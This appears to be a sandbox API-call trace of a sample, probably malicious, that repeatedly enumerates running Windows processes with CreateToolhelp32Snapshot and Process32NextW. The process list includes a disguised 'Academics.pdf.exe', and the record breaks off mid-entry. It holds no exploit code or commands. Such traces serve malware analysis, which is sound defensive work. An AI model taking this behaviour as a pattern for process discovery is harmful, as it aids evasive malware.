[0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0285.463] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0285.463] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0285.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0285.467] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0285.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0285.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0285.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0285.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0285.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0285.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0285.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0285.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0285.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0285.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0285.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0285.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0285.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0285.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0285.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0285.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0285.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0285.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0285.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0285.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0285.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.502] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0285.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0285.506] CloseHandle (hObject=0x294) returned 1 [0285.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0285.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0285.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0285.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0285.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0285.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0285.509] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.511] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0285.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0285.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, 